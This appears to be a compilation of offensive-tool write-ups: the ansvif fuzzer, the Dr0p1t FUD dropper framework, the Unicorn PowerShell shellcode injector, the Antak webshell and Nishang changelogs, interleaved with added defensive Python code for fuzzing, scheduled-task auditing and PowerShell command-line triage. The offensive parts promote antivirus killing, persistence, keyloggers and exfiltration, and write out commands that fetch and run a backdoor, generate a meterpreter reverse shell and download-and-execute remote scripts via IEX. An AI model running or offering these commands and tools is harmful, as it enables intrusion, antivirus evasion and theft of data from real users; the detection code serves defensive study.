The address may be a little different under your distro; check gdb if you really want to try it out. The code above /should/ drop you at a bash prompt. If the code is set to a mode where all are able to execute as another user, it will attempt to spawn a root shell. Or simply run make test.

Usage:
Important note: Windows users will have to run ansvif.exe from Powershell for it to work!
$ ./find_suid /usr/bin/ /bin/ /sbin/
$ ./ansvif -[tm] [template/manpage] -c /path/to/executable -b buffersize

Examples:
Linux/BSD:
$ echo "Marshall" ./ansvif -t examples/template -c ./faulty -b 64
$ ./ansvif -m mount -c /bin/mount -e examples/mount_e.txt -x examples/mount_o.txt\
-f 8 -b 2048
$ ./ansvif -t examples/blank.txt -F tmp/tmphtml -x examples/htmltags.txt -c /usr/bin/iceweasel -b\
128 -A "file:///home/username/src/ansvif/tmp/tmphtml" -f 2 -n -R "sleep 3 && killall\
iceweasel" -S ">"
$ cat examples/linux_syscalls_implemented.list | xargs -P \
`cat examples/linux_syscalls_implemented.list | wc -l` -I {calls} ./ansvif -t examples/space.txt \
-B "{calls} " -c ./syscalls -o syscall_crash -f 1 -z -d -b 16
Windows:
PS C:\ansvif\bin\ansvif_win> .\ansvif -t ..\..\examples\space -F ..\..\tmp\tmphtml -x `
..\..\examples\htmltags -c `
'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe' `
-b 128 -A "file:///C:\\Users\marsh\OneDrive\Documents\Code\ansvif\tmp\tmphtml" `
-f 2 -n -S ">" -R "sleep 2 ; Stop-Process -Name chrome"

Options:
-t This file should hold line by line command arguments as shown in the example file.
-e This file should hold line by line environment variables as shown in the example
file. You can usually get these by doing something like:
$ strings /bin/mount | perl -ne 'print if /[A-Z]=$/' > mount_envs
-c Specifies the command path.
-p Specifies the manpage section (as an integer, usually 1 or 8)
-m Specifies the command's manpage.
-D Dumps what's found in the manpage.
-f Number of threads to use. Default is 2.
-b Specifies the buffer size to fuzz with. 256-2048 is usually sufficient.
-r Uses only random garbage data.
-o Writes output to log file.
-z Randomize the buffer size from 1 to what is specified by -b.
-x Other junk to put in. Usernames and such can go here.
-S Separator between options.
-s Omitted character specification. Defaults are <>\\n |&\[]\()\{}:;\ and newline is mandatory.
-T Timeout for threads.
-W Timeout for threads.
-L Unprivileged user to run as if root.
-A Always put what's after this after the command to run.
-B Always put what's after this before the command to run.
-F File to feed into the program that -x along with normal fuzzing data will be put in.
-n Never use random data in the fuzz.
-R Run this command after each fuzz.
-C A non-standard error code to detect.
-V Use Valgrind if installed.
-1 Try to make it fault once; if it doesn't happen, throw error code 64. Useful for scripting.
-P Use % to represent binary in fuzz.
-M Max arguments to use in the fuzz.
-y Short for -b 0 and usually only useful with -A or -B
-K Keep fuzzing after a crash in the target.
-v Verbose.
-d Debug data.
-h Shows the help page.
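The options above describe a conventional argument fuzzer: a buffer size, an optional random length, a set of characters kept out of the data, and an exit status that scripts can branch on. The harness below is an added example, not ansvif's own code, that shows those mechanics end to end: it builds arguments from the characters that are not in the default -s set (my reading of the option text), runs the target once per argument, tells a signal-killed child apart from a clean exit, and returns the inputs that faulted, with a -1 style status of 64 when nothing did. The target is a constructed stand-in, a Python one-liner that sends itself SIGSEGV when its argument exceeds 24 bytes, so nothing here is faulty.c or a real binary.

```python
"""Minimal argument fuzz harness (added example, not ansvif's code).

Mirrors -b (maximum buffer size), -z (random length from 1 up to -b), the
default omitted character set of -s and the "fault once or exit 64"
contract of -1. Crashes are recognised by the signal that killed the child,
which POSIX exposes as a negative return code.
"""
import random
import signal
import subprocess
import sys

# Characters ansvif leaves out by default, as read from the -s description:
# shell metacharacters, whitespace and the backslash.
OMITTED = set("<>\n |&[](){}:;\\")
ALPHABET = [chr(c) for c in range(33, 127) if chr(c) not in OMITTED]

# Constructed stand-in target. With `python -c code arg`, the argument is
# sys.argv[1] inside the -c script and option parsing has already stopped.
TARGET = [
    sys.executable, "-c",
    "import os, signal, sys\n"
    "if len(sys.argv[1]) > 24:\n"
    "    os.kill(os.getpid(), signal.SIGSEGV)\n",
]


def make_buffer(rng, max_size, randomize_size=True):
    """One fuzz argument: -b sets the size, -z picks it from 1..max_size."""
    size = rng.randint(1, max_size) if randomize_size else max_size
    return "".join(rng.choice(ALPHABET) for _ in range(size))


def classify(returncode):
    """POSIX subprocess return codes: negative means killed by that signal."""
    if returncode < 0:
        return "crash:" + signal.Signals(-returncode).name
    return "exit:%d" % returncode


def fuzz_once(command, arg, timeout=5.0):
    """Run the target with one argument and report the verdict (-T style)."""
    try:
        proc = subprocess.run(command + [arg], capture_output=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return "timeout"
    return classify(proc.returncode)


def fuzz(command, max_size, iterations, seed=0, fault_once=False):
    """Return (verdict, argument) pairs for every run that crashed or hung.

    Non-zero but orderly exits (usage errors) are not faults. With
    fault_once=True the loop stops at the first fault, as ansvif -1 does.
    """
    rng = random.Random(seed)
    faults = []
    for _ in range(iterations):
        arg = make_buffer(rng, max_size)
        verdict = fuzz_once(command, arg)
        if verdict.startswith("crash:") or verdict == "timeout":
            faults.append((verdict, arg))
            if fault_once:
                break
    return faults


def fault_once_status(faults):
    """Exit status for scripting: 0 when something faulted, else 64 (as -1)."""
    return 0 if faults else 64


if __name__ == "__main__":
    found = fuzz(TARGET, max_size=64, iterations=50, fault_once=True)
    for verdict, arg in found:
        print(verdict, repr(arg))
    sys.exit(fault_once_status(found))
```

Run it directly and it prints the first faulting input, then exits 0, or 64 when no run faulted, which is what makes the -1 contract convenient inside a loop over many templates. The signal mapping relies on POSIX return codes; on Windows you would inspect the process exception code instead.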

Recommendations: It is recommended that if you are doing long fuzzes or file fuzzing, if possible put the files (including the binary you are fuzzing if possible) in memory. This means, put them somewhere like /var/run/shm where disk thrash will be minimal, and fuzzing will be somewhat faster, especially if large files are being handled. Be warned however: You will lose your fuzzed files if they are in shm and you reboot the machine!

DO NOT RUN THIS CODE IN A PRODUCTION ENVIRONMENT! If you try setting faulty.c's output to suid(0) then PLEASE do it in a virtual machine, or at least a machine that you don't care about. Other than that, just play around and have fun!

Notes:
Windows users must have ansvif running from PowerShell. Linux and Windows code should be relatively stable. Syscall fuzzing under Linux is under heavy development.

Dr0p1t-Framework - A Framework That Creates An Advanced FUD Dropper With Some Tricks

Have you ever heard about trojan droppers? You can read about them here.
Dr0p1t lets you create a dropper like any other tool, but this time FUD with some tricks ;)

Features
  • Works with Windows and Linux
  • Adding malware after downloading it to startup
  • Adding malware after downloading it to task scheduler
  • Finding and killing the antivirus before running the malware
  • Running a custom (batch|powershell|vbs) file you have chosen before running the malware
  • When running PowerShell scripts it can bypass the execution policy
  • Using UPX to compress the dropper after creating it
  • Choose an icon for the dropper after creating it
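Both persistence options in that list (Startup folder and Task Scheduler) leave artefacts that an administrator can audit, and a dropper that runs without elevation has to place its payload somewhere the user can write. The audit below is an added example written from the defender's side; it is not Dr0p1t's code. It parses task definitions in the XML form that `schtasks /query /xml` prints (the `mit/task` namespace is the real one; the two task documents are constructed) and flags tasks that combine two or more weak signals: action in a temp or profile path, hidden task, no author, logon or boot trigger. It also screens Startup-folder shortcuts by their resolved target. The writable-path list is a constructed shortlist, not a complete policy.

```python
"""Scheduled Task and Startup-folder persistence audit (added example,
not Dr0p1t's code). Inputs are constructed; the task XML namespace is the
one Windows uses for exported task definitions.
"""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Locations a non-elevated process can write to (constructed shortlist).
WRITABLE_HINTS = re.compile(
    r"\\(?:Temp|AppData|ProgramData|Users\\Public|Downloads)\\", re.IGNORECASE)


def audit_task_xml(xml_text):
    """Findings for one exported task; [] when no two signals coincide."""
    root = ET.fromstring(xml_text)
    name = root.findtext("t:RegistrationInfo/t:URI", "(unnamed)", TASK_NS)
    author = root.findtext("t:RegistrationInfo/t:Author", "", TASK_NS)
    hidden = root.findtext("t:Settings/t:Hidden", "false", TASK_NS).strip().lower() == "true"
    # Trigger element names without the namespace prefix, e.g. LogonTrigger.
    triggers = {t.tag.rsplit("}", 1)[-1] for t in root.findall("t:Triggers/*", TASK_NS)}
    findings = []
    for action in root.findall("t:Actions/t:Exec", TASK_NS):
        command = action.findtext("t:Command", "", TASK_NS).strip().strip('"')
        reasons = []
        if WRITABLE_HINTS.search(command):
            reasons.append("command in user-writable path")
        if hidden:
            reasons.append("task hidden from the scheduler UI")
        if not author.strip():
            reasons.append("no author recorded")
        if triggers & {"LogonTrigger", "BootTrigger"}:
            reasons.append("runs at logon/boot")
        # Any single signal is common for legitimate tasks; require two.
        if len(reasons) >= 2:
            findings.append({"task": name, "command": command, "reasons": reasons})
    return findings


def audit_startup_entries(entries):
    """entries: (shortcut name, resolved target) pairs from a Startup folder.
    Returns those whose target lives in a user-writable location."""
    return [(name, target) for name, target in entries if WRITABLE_HINTS.search(target)]


# Constructed task definitions in the exported-XML shape.
SUSPICIOUS_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\WindowsUpdateCheck</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec><Command>C:\Users\alice\AppData\Local\Temp\update.exe</Command></Exec>
  </Actions>
</Task>"""

BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Contoso\AgentHealthCheck</URI><Author>CONTOSO\svc-deploy</Author></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author">
    <Exec><Command>"C:\Program Files\Contoso\agent.exe"</Command><Arguments>--check</Arguments></Exec>
  </Actions>
</Task>"""

STARTUP_ENTRIES = [  # constructed (shortcut name, resolved target)
    ("Agent.lnk", r"C:\Program Files\Contoso\agent.exe"),
    ("update.lnk", r"C:\Users\alice\AppData\Local\Temp\update.exe"),
]

if __name__ == "__main__":
    for xml_text in (SUSPICIOUS_TASK_XML, BENIGN_TASK_XML):
        print(audit_task_xml(xml_text))
    print(audit_startup_entries(STARTUP_ENTRIES))
```

The two-signal threshold is the design choice worth noting: a logon trigger alone describes most legitimate agents, and a Temp path alone catches installers mid-flight, but a hidden, author-less task that runs a Temp binary at logon is exactly what the persistence options above produce.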

Screenshots

On Windows

On Linux (Backbox)

Help menu
Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help show this help message and exit
-s Add your malware to startup (Persistence)
-t Add your malware to task scheduler (Persistence)
-k Kill antivirus process before running your malware.
-b Run this batch script before running your malware. Check scripts folder
-p Run this powershell script before running your malware. Check scripts folder
-v Run this vbs script before running your malware. Check scripts folder
--only32 Download your malware for 32 bit devices only
--only64 Download your malware for 64 bit devices only
--upx Use UPX to compress the final file.
-i Use icon to the final file. Check icons folder.
-q Stay quiet (no banner)
-u Check for updates
-nd Display less output information

Examples
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1

Prerequisites
  • Python 3.x (preferred 3.5)
  • Python libraries requirements in requirements.txt

Installation
First download it with
git clone https://github.com/D4Vinci/Dr0p1t-Framework
If you are on Linux, then do
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py
And if you are on Windows, download it and then do
cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py
The libraries in windows_requirements.txt enable Unicode output on Windows, which makes coloring possible.

Todo
  • Python 2 support
  • Work on UAC bypass
  • Work on spreading on the device and maybe on the LAN too
  • Injecting dr0pp3r to another program
  • More modules

Unicorn - Tool for using a PowerShell downgrade attack and inject shellcode straight into memory

Magic Unicorn is a simple tool for using a PowerShell downgrade attack and injecting shellcode straight into memory. It is based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Usage is simple: just run Magic Unicorn (ensure Metasploit is installed and in the right path) and it will automatically generate a PowerShell command that you simply cut and paste into a command line window or deliver through a payload delivery system.

root@bt:~/Desktop# python unicorn.py

Unicorn is a PowerShell injection tool utilizing Matthew Graeber's attack, expanded to automatically downgrade the process if a 64-bit platform is detected. This is useful in order to ensure that we can deliver a payload with just one set of shellcode instructions. This will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.

Usage:
python unicorn.py payload reverse_ipaddr port
Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443

Antak WebShell - A webshell which utilizes PowerShell

Antak is a webshell written in C#.Net which utilizes PowerShell. Antak is part of Nishang and updates can be found here: https://github.com/samratashok/nishang

Use this shell as you would a normal PowerShell console. Each command is executed in a new process; keep this in mind when using commands that depend on state (like changing the current directory or running session-aware scripts).

Executing PowerShell scripts on the target -
  1. Paste the script in the command textbox and click 'Encode and Execute'. A reasonably large script can be executed this way.
  2. Use a PowerShell one-liner (example below) for download & execute in the command box:
     IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
  3. Upload the script to the target and execute it.
  4. Make the script a semicolon-separated one-liner.
Files can be uploaded and downloaded using the respective buttons.
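The download-and-execute one-liner in step 2, the encoded route in step 1 and the version downgrade that Unicorn performs all end up in process-creation telemetry as a powershell.exe command line. The triage below is an added example written from the defender's side; it is not code from Antak, Unicorn or Nishang. It looks for the forced version-2 downgrade, the NoProfile / NonInteractive / WindowStyle Hidden / ExecutionPolicy Bypass switches, an -EncodedCommand payload (base64 of UTF-16LE text, which it decodes before inspection), the IEX download cradle, and a 32-bit PowerShell launched from SysWOW64 on a 64-bit host. The indicator names, the confidence split and all three sample command lines (including the example.invalid URL) are constructed for this example.

```python
"""PowerShell command-line triage for process-creation events (added
example, not code from the tools above). Sample events are constructed.
"""
import base64
import re

# powershell.exe accepts any unambiguous prefix of a switch, so each pattern
# covers the usual short forms as well as the full name. The lookbehind keeps
# "-e" from matching inside a longer token such as "-noe".
FLAG_PATTERNS = {
    "downgrade":       r"-v(?:ersion)?\s+2(?:\.0)?\b",
    "no_profile":      r"-nop(?:rofile)?\b",
    "non_interactive": r"-noni(?:nteractive)?\b",
    "hidden":          r"-w(?:indowstyle)?\s+hidden\b",
    "ep_bypass":       r"-e(?:x|p|xec|xecutionpolicy)\s+bypass\b",
    "encoded":         r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})",
}
FLAG_PATTERNS = {k: re.compile(r"(?<![\w-])" + v, re.IGNORECASE)
                 for k, v in FLAG_PATTERNS.items()}

# Indicators searched in the visible command line plus any decoded payload.
CONTENT_PATTERNS = {
    "download_cradle": r"(?:IEX|Invoke-Expression)\b.*(?:DownloadString|DownloadFile|WebClient)",
    "in_memory_injection": r"VirtualAlloc|CreateThread|GetProcAddress|DllImport",
    "syswow64_powershell": r"\\SysWOW64\\WindowsPowerShell\\",
}
CONTENT_PATTERNS = {k: re.compile(v, re.IGNORECASE | re.DOTALL)
                    for k, v in CONTENT_PATTERNS.items()}

HIGH_CONFIDENCE = {"downgrade", "download_cradle", "in_memory_injection",
                   "syswow64_powershell"}


def decode_encoded_command(blob):
    """-EncodedCommand carries base64 of UTF-16LE text; '' if it is not that."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def make_encoded(script):
    """Inverse of decode_encoded_command, used here only to build samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def triage(cmdline):
    """Sorted list of indicator names found in one command line."""
    found = set()
    text = cmdline
    for name, pat in FLAG_PATTERNS.items():
        match = pat.search(cmdline)
        if match is None:
            continue
        found.add(name)
        if name == "encoded":
            # Inspect what the operator was hiding, not just that it was hidden.
            text += "\n" + decode_encoded_command(match.group(1))
    for name, pat in CONTENT_PATTERNS.items():
        if pat.search(text):
            found.add(name)
    return sorted(found)


def verdict(cmdline):
    """'suspicious' on any high-confidence indicator or three weaker ones."""
    indicators = triage(cmdline)
    if HIGH_CONFIDENCE & set(indicators) or len(indicators) >= 3:
        return "suspicious", indicators
    return "benign", indicators


SAMPLE_EVENTS = [  # constructed process-creation command lines
    r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -noni -ep bypass -v 2 -e "
    + make_encoded("Write-Host 'constructed sample naming VirtualAlloc and CreateThread'"),
    "powershell.exe -ExecutionPolicy Bypass -Command \"IEX ((New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/script.ps1'))\"",
    r"powershell.exe -NoProfile -File C:\Scripts\Get-Inventory.ps1",
]

if __name__ == "__main__":
    for line in SAMPLE_EVENTS:
        print(verdict(line))
```

Two caveats for anyone wiring this into a pipeline: `-Version 2` is also used by administrators for compatibility, which is why it only counts as a single high-confidence hit rather than a verdict on its own, and decoding the payload matters because the flags alone say nothing about whether the script downloads, injects, or merely sets a console title.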

Uploading a file - To upload a file you must mention the actual path on server (with write permissions) in command textbox. (OS temporary directory like C:\Windows\Temp may be writable.) Then use Browse and Upload buttons to upload file to that path.

Downloading a file - To download a file enter the actual path on the server in command textbox. Then click on Download button.

Main Features:
  • Upload a file
  • Download a file
  • Executing Scripts
  • Remoting/Pivoting

[Nishang v0.3.0] The PowerShell for Penetration Testing released (introducing Powerpreter)

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetration Tests. The scripts are written on the basis of requirements the author encountered during real Penetration Tests.


Powerpreter is a powershell module. I decided to make it a part of Nishang as there is a large amount of repeated code. This post assumes that we have Administrative access to a Windows 7 machine. 

Powerpreter can surely be used as a non-admin user but obviously with limited (but still useful) functionality. Like other scripts in Nishang, I have tried my best to keep Powerpreter compatible with PowerShell v2, so you may see some code which could be done by a cmdlet in PowerShell v3 and v4.

Changelog

  • Added Powerpreter
  • Added Execute-DNSTXT-Code
  • Bug fix in Create-MultipleSessions.
  • Changes to StringToBase64. It now supports Unicode encoding which makes it usable with -Encodedcommand.
  • More Changes to StringToBase64. Now a file can be converted.
  • Added Copy-VSS
  • Information_Gather shows output in better format now.
  • Information_Gather renamed to Get-Information.
  • Wait for command renamed to HTTP-Backdoor.
  • Time_Execution renamed Execute-OnTime
  • Invoke-PingSweep renamed to Port-Scan
  • Invoke-Medusa renamed to Brute-Force

[Nishang v.0.2.7] PowerShell for Penetration Testing

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetration Tests. The scripts are written on the basis of requirements the author encountered during real Penetration Tests. It contains many interesting scripts like download and execute, keylogger, DNS TXT pwnage, wait for command and much more.



Changelog:

- DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now be stopped remotely. Also, these do not stop automatically after running a script/command now.
- DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now return results using selected exfiltration method. 
- Fixed a minor bug in DNS_TXT_Pwnage. 
- All payloads which could post data to the internet now have three options pastebin/gmail/tinypaste for exfiltration. 
- Added Get-PassHashes payload. 
- Added Download-Execute-PS payload. 
- The keylogger logs only fresh keys after exfiltrating the keys 30 times.
- A delay after success has been introduced in various payloads which connect to the internet to avoid generating too much traffic.